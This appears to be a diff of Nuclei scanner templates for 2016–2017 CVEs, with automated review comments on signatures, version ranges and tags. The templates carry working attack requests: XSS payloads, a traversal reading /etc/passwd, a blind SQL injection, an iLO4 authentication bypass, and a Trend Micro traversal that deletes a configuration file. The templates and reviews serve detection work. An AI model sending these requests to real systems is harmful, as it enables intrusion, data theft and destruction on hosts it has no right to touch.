http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49889 - cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: hdw-tube_project - product: hdw-tube - framework: wordpress google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve,cve2016,wordpress,xss,wp-plugin -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -35,9 +27,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header 
@@ -47,4 +39,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da5dab271b8802808631270457f57f5994e0690683d67fa537c62ddceec66f320220538c9e9e48d6c08c54d24ad017c0a383ab38d9a51a5ebb81668436eb5ee223b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000143.yaml b/poc/cve/CVE-2016-1000143.yaml index e426b63aa3..3b67015203 100644 --- a/poc/cve/CVE-2016-1000143.yaml +++ b/poc/cve/CVE-2016-1000143.yaml 
@@ -1,49 +1,33 @@ id: CVE-2016-1000143 - info: - name: WordPress Photoxhibit 2.1.8 - Cross-Site Scripting + name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor. + description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - - https://wordpress.org/plugins/photoxhibit - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 + - https://wordpress.org/plugins/photoxhibit classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000143 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49745 - cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: photoxhibit_project - product: photoxhibit - framework: wordpress tags: cve,cve2016,wordpress,wp-plugin,xss - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - '' - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100e7ca934d68266a3e570bdddaacb8abe8b6d04b7685c395ae8c2f826b248c0fc3022100f519f77b2ce2685c3fcce3dbea85e33309613fbb8e175db1575b7c85bbc54165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
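Review bot: The `# digest:` signature line is removed in the same hunk that rewrites the template body, so the file lands unsigned and a consumer can no longer tell a reviewed template from an altered one. The commit is authored by an automated action, so each rewritten template should be reviewed and re-signed with the repository's own key before it is merged. Until that happens I would mark the file explicitly, for example `# unsigned: imported by automated sync, not yet reviewed`. The digest is dropped the same way in CVE-2016-1000134, CVE-2016-1000146, CVE-2016-1000155, CVE-2016-10940, CVE-2016-7552, CVE-2017-14535, CVE-2017-15647 and CVE-2017-17451.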
diff --git a/poc/cve/CVE-2016-1000146.yaml b/poc/cve/CVE-2016-1000146.yaml index 2ba55d4526..f14bf4f330 100644 --- a/poc/cve/CVE-2016-1000146.yaml +++ b/poc/cve/CVE-2016-1000146.yaml @@ -1,32 +1,19 @@ id: CVE-2016-1000146 info: - name: WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting + name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability. - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 - - https://wordpress.org/plugins/pondol-formmail - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + tags: cve,cve2016,wordpress,xss,wp-plugin,mail classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000146 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45801 - cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: pondol-formmail_project - product: pondol-formmail - framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,mail + description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
@@ -34,9 +21,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header @@ -46,4 +33,3 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210093c8445c11f415ff59a2ea84ec6d762f1b539c26be7f49f199b235f4955560d902204020aec5844f8ffd75c8cf3ef37da8ebb75c0ce3d7b96b41e5790f0cc26d1574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000154.yaml b/poc/cve/CVE-2016-1000154.yaml index 224b14f744..5812a26749 100644 --- a/poc/cve/CVE-2016-1000154.yaml +++ b/poc/cve/CVE-2016-1000154.yaml 
@@ -1,34 +1,49 @@ id: CVE-2016-1000154 + info: - name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) + name: WordPress WHIZZ <=1.0.7 - Cross-Site Scripting author: daffainfo severity: medium - description: Reflected XSS in wordpress plugin whizz v1.0. + description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - https://wordpress.org/plugins/whizz - - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000154 cwe-id: CWE-79 + epss-score: 0.00142 + epss-percentile: 0.49745 + cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: browserweb + product: whizz + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin -requests: + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a00473045022100eaa3c28f65c65ac7217e2267b8416e76471a54e695b51014fa5e7a16b2f722ff02206c7c0182fff2cfaf67f8222a698473dcca6b2b38b1efd81bbc4113eb2ebafd81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
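Review bot: The added description names the affected release as `WHIZZ 1.07 and before`, while the new `name` and the remediation line use `<=1.0.7` and `>=1.0.8`. The description should read `WordPress plugin WHIZZ 1.0.7 and before contains a reflected cross-site scripting vulnerability ...`, otherwise a reader triaging the finding sees two different version boundaries in one template.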
diff --git a/poc/cve/CVE-2016-1000155.yaml b/poc/cve/CVE-2016-1000155.yaml index de8ccbe948..70f109f44c 100644 --- a/poc/cve/CVE-2016-1000155.yaml +++ b/poc/cve/CVE-2016-1000155.yaml @@ -1,32 +1,19 @@ id: CVE-2016-1000155 info: - name: WordPress WPSOLR <=8.6 - Cross-Site Scripting + name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of WPSOLR plugin (8.7 or higher). - reference: - - https://wordpress.org/plugins/wpsolr-search-engine - - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000155 cwe-id: CWE-79 - epss-score: 0.00103 - epss-percentile: 0.41683 - cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: wpsolr - product: wpsolr-search-engine - framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin + description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -34,9 +21,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header 
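Review bot: The new `name` gives the affected range as `WPSOLR <= 8.6`, but the added `description` says `wpsolr-search-engine v7.6`, and the removed `cpe` line also named 7.6. One of the two is wrong, and the template offers no way to tell which, so the version should be checked against the NVD entry in `reference` and both fields made to agree, e.g. `description: "Reflected XSS in wordpress plugin wpsolr-search-engine <= <AFFECTED_VERSION>"` (placeholder to be filled in from the advisory). The hunk also removes the remediation text that told operators which release to move to.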
@@ -46,4 +33,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c9038473fafe52cc4b5874ec8536c9b036f0290d4655fc9128da48d21f6bef660220186364b4daf33293067febd6647d40e5574466af405f198bf886d22f7ef0a169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-10367.yaml b/poc/cve/CVE-2016-10367.yaml index 5c754519c7..c7285e8ae6 100644 --- a/poc/cve/CVE-2016-10367.yaml +++ b/poc/cve/CVE-2016-10367.yaml 
@@ -1,27 +1,44 @@ id: CVE-2016-10367 + info: - name: Opsview Monitor Pro - Unauthenticated Directory Traversal + name: Opsview Monitor Pro - Local File Inclusion author: 0x_akoko severity: high - description: The unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass + description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass. + remediation: | + Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability. reference: - - https://www.cvedetails.com/cve/CVE-2016-10367 - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 + - https://nvd.nist.gov/vuln/detail/CVE-2016-10367 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10367 cwe-id: CWE-22 + epss-score: 0.01346 + epss-percentile: 0.84603 + cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* + metadata: + verified: true + max-request: 1 + vendor: opsview + product: opsview + shodan-query: title:"Opsview" tags: cve,cve2016,opsview,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 404 +# digest: 4b0a00483046022100fd2ab29066206b564709a4a43d2258badc5de7bdcaeae07f52bb8297c2005dd2022100e5ea673a027614e2c3b8c5ba0943ca3af9581ebee0f2bd25ef125d908bfd3b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
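Review bot: The matchers combine a `root:[x*]:0:0` body regex with `status: 404` under `matchers-condition: and`, and nothing in the template explains why a successful file read is expected to arrive with a 404. The hunk adds `verified: true`, so this is presumably intentional, but an undocumented 404 looks like a typo and invites a later "fix" to 200 that would silently stop the template from matching. I would add a comment above the status matcher such as `# affected Opsview builds return the file content in a 404 response`, after confirming that against the Trustwave advisory in `reference`.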
diff --git a/poc/cve/CVE-2016-10940.yaml b/poc/cve/CVE-2016-10940.yaml index 906a492ffa..09a4757397 100644 --- a/poc/cve/CVE-2016-10940.yaml +++ b/poc/cve/CVE-2016-10940.yaml @@ -1,34 +1,21 @@ id: CVE-2016-10940 - info: name: WordPress zm-gallery plugin 1.0 SQL Injection author: cckuailong,daffainfo severity: high description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. - remediation: | - Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor. reference: - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - - https://wordpress.org/plugins/zm-gallery/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2016-10940 cwe-id: CWE-89 - epss-score: 0.00696 - epss-percentile: 0.77975 - cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* - metadata: - max-request: 3 - vendor: zm-gallery_project - product: zm-gallery - framework: wordpress - tags: wpscan,cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated - -http: + tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -44,7 +31,8 @@ http: - | GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 Host: {{Hostname}} - + req-condition: true + cookie-reuse: true matchers: - type: dsl dsl: 
@@ -53,4 +41,5 @@ http: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and -# digest: 490a00463044022061955ffb85d47212a0ae3ccbcd512ea4a1a81cfdfbfb7fc63a0cf9c4dd8eee5102205349ca6b645e5be5a0209c6358e8603b07034afd4de57bc9beddb54623be8d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/12 diff --git a/poc/cve/CVE-2016-7552.yaml b/poc/cve/CVE-2016-7552.yaml index eb53993917..140a337d54 100644 --- a/poc/cve/CVE-2016-7552.yaml +++ b/poc/cve/CVE-2016-7552.yaml 
@@ -1,46 +1,34 @@ id: CVE-2016-7552 - info: name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass author: dwisiswant0 severity: critical description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. - remediation: | - Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability. reference: - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 + - http://www.securityfocus.com/bid/97599 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 - epss-score: 0.97004 - epss-percentile: 0.99681 - cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: trendmicro - product: threat_discovery_appliance - tags: msf,cve,cve2016,lfi,auth,bypass - -http: + tags: cve,cve2016,lfi,auth,bypass +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/logoff.cgi" - headers: Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word - part: body words: - "Memory map" + part: body - - type: status - status: - - 200 -# digest: 4a0a00473045022100f94ac860dc3e8f0596d0f1ff2cc0216572e607fc9a80a6cc71a4b5e7a8ab770d022025453afcb701644d58bd8b104aca7eb245a0863fe1169f541c66983e4b774b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/05/10 diff --git a/poc/cve/CVE-2017-11586.yaml b/poc/cve/CVE-2017-11586.yaml index 5816b710d3..8d62ec0631 100644 
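Review bot: This check looks destructive but is not tagged as such: the request sends `session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf` to `logoff.cgi`, and the template's own description says the flaw lets an unauthenticated request delete arbitrary files as root. A match therefore appears to mean the configuration file was removed on the scanned appliance. The new tag line should carry that, `tags: cve,cve2016,lfi,auth,bypass,intrusive`, so scans that exclude intrusive templates skip it, and a comment above the `headers` block should state the side effect. The hunk also drops the `remediation` field, which a finding of critical severity should keep.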
--- a/poc/cve/CVE-2017-11586.yaml
+++ b/poc/cve/CVE-2017-11586.yaml
@@ -1,25 +1,46 @@ id: CVE-2017-11586 + info: - name: dayrui FineCms 5.0.9 - Open redirect + name: FineCMS <5.0.9 - Open Redirect author: 0x_Akoko - severity: low - description: dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action. + severity: medium + description: | + FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability. reference: - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse - - https://www.cvedetails.com/cve/CVE-2017-11586 - - https://vuldb.com/?id.104434 - tags: cve,cve2017,redirect,opentext + - https://nvd.nist.gov/vuln/detail/CVE-2017-11586 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-11586 cwe-id: CWE-601 -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?c=weixin&m=sync&url=http://example.com' + epss-score: 0.00121 + epss-percentile: 0.46157 + cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: finecms + product: finecms + tags: cve,cve2017,redirect,finecms + +http: + - raw: + - | + POST /index.php?s=member&c=login&m=index HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1 + - | + GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1 + Host: {{Hostname}} + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - 
'Refresh:(.*)url=http:\/\/interact\.sh' +# digest: 4a0a00473045022012509eabce87ba3935765ddc6532e3a6d2c09fe4379599d5dd7c1e7383e33be5022100a3fd0d355a68651ee526f569ea234e085e8ab6afce65195a78a4718b6a0a1090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-12542.yaml b/poc/cve/CVE-2017-12542.yaml index e6b40b0d91..f47f845ac7 100644 --- a/poc/cve/CVE-2017-12542.yaml +++ b/poc/cve/CVE-2017-12542.yaml 
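Review bot: The new request chain logs in with `{{username}}` and `{{password}}` before probing the redirect, but the tag line `cve,cve2017,redirect,finecms` does not say the template needs credentials. The CVE-2016-10940 template in this same patch marks that case with `authenticated`, so this one should read `tags: cve,cve2017,redirect,finecms,authenticated`; without it the template is selected in unauthenticated scans where the variables are unset and the result is meaningless. The `name` also says `<5.0.9` while the description says 5.0.9 itself is affected and the remediation says to upgrade to 5.0.9 or later; these three should be reconciled against the NVD entry.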
@@ -1,38 +1,52 @@ id: CVE-2017-12542 info: - name: ILO4 Authentication bypass + name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass author: pikpikcu severity: critical - description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. + remediation: | + Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 - tags: cve,cve2017,ilo4,hpe + - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us + - https://www.exploit-db.com/exploits/44005/ + - http://www.securitytracker.com/id/1039222 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2017-12542 + epss-score: 0.97377 + epss-percentile: 0.9989 + cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: hp + product: integrated_lights-out_4_firmware + tags: ilo4,hpe,auth-bypass,edb,cve,cve2017 -requests: +http: - method: GET path: - "{{BaseURL}}/rest/v1/AccountService/Accounts" + headers: Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA matchers-condition: and matchers: - type: word + part: body words: - "iLO User" - part: body - type: word + part: header words: - "application/json" - part: header - type: status status: - 200 +# digest: 4a0a004730450220429a8b37441b3f7a31d7a70b3d8cf3816e65b09067b0c4f6b33346e41c0dae59022100f9f898aab40e31fb23cfc81fc3a7a1981385c4a1c3ed721f035c55fdf5bff51a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2017-12794.yaml b/poc/cve/CVE-2017-12794.yaml
index ad1ea847cc..62a93166af 100644
--- a/poc/cve/CVE-2017-12794.yaml
+++ b/poc/cve/CVE-2017-12794.yaml
@@ -1,22 +1,34 @@ id: CVE-2017-12794 info: - name: Django debug page XSS + name: Django Debug Page - Cross-Site Scripting author: pikpikcu severity: medium + description: | + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + remediation: | + Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project. reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - description: | - In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. - tags: xss,django,cve,cve2017 + - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ + - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 + - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 + epss-score: 0.00219 + epss-percentile: 0.59752 + cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: djangoproject + product: django + tags: xss,django,cve,cve2017 -requests: +http: - method: GET path: - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" 
@@ -24,15 +36,16 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word + part: header words: - "text/html" - part: header + + - type: status + status: + - 200 +# digest: 4a0a00473045022100f1121fac785c9238b8e61276548c561b0b96e045544022766beaf1c0e0c9b7ca022017f8960e76abcfd828a50ce20b7c819daa17d70270d2cab2460815978f627ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-14524.yaml b/poc/cve/CVE-2017-14524.yaml index e87149510b..be7c67f156 100644 --- a/poc/cve/CVE-2017-14524.yaml +++ b/poc/cve/CVE-2017-14524.yaml 
@@ -1,25 +1,40 @@ id: CVE-2017-14524 + info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect author: 0x_Akoko - severity: low - description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. + severity: medium + description: | + OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://www.cvedetails.com/cve/CVE-2017-14524 - - https://vuldb.com/?id.107201 - tags: cve,cve2017,redirect,opentext + - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 -requests: + epss-score: 0.00258 + epss-percentile: 0.63405 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve,cve2017,redirect,opentext,seclists + +http: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' + - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - 
'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4a0a00473045022067c66ad6a35140adea527b46677371897d097f59fd7bc558671a8532fbb99f4e022100f1adf441d12b7d3fbfbd021a1de838d34432ef3d8740bbd1f69fec1252a7ca12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-14535.yaml b/poc/cve/CVE-2017-14535.yaml index 44aec5d553..8cc11f11f1 100644 --- a/poc/cve/CVE-2017-14535.yaml +++ b/poc/cve/CVE-2017-14535.yaml @@ -1,33 +1,21 @@ id: CVE-2017-14535 info: - name: Trixbox - 2.8.0.4 OS Command Injection + name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability author: pikpikcu severity: high - description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. - remediation: | - Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor. reference: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 - - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t - - https://twitter.com/tiger_tigerboy/status/962689803270500352 + tags: cve,cve2017,trixbox,rce,injection classification: cvss-metrics: 